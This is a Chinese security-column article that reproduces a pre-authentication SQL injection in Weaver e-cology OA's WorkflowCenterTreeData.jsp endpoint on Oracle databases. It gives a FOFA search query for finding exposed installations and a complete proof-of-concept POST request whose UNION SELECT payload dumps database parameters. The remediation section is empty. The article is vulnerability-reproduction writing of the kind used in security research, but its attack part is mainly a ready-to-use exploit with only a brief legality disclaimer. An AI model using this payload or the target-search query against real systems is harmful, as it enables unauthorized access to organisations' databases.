专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
史事挖掘机  ·  伊朗往事:霍梅尼的崛起 ·  15 小时前  
上下五千年故事  ·  “十人九湿”,万病皆始于湿,试试这个小方子 ·  3 天前  
电视剧鹰眼  ·  【鹰眼头条】短剧2025年1月榜:番茄以总热 ... ·  4 天前  
51好读  ›  专栏  ›  TimelineSec

泛微 e-cology OA 前台SQL注入漏洞复现

TimelineSec  · 公众号  ·  · 2019-10-10 21:17

正文

本公众号专注于漏洞复现,欢迎关注!

-------------------------------------------------------------------------------------

本文作者:CreaT0ye(Timeline Sec核心成员)

本文共643字,阅读大约需要2分钟


0x00 简介


泛微提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。


0x01 原理概述


该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。


0x02 影响范围


使用oracle数据库的泛微 e-cology OA 系统


0x03 环境搭建


在线环境(限今晚):

打赏(任意金额)+转发,联系作者获取

FOFA搜索:

app="泛微-协同办公OA"

自行搭建:

公众号内回复“泛微环境”


0x04 漏洞利用


找到oracle数据库的泛微OA系统后直接使用Poc(已公开)

如果不存在漏洞,则显示结果如下



如果漏洞存在,则会直接回显很多数据



简洁版Poc如下:(勿用于非法途径)

POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 2236Connection: closeUpgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1


0x05 修复建议







请到「今天看啥」查看全文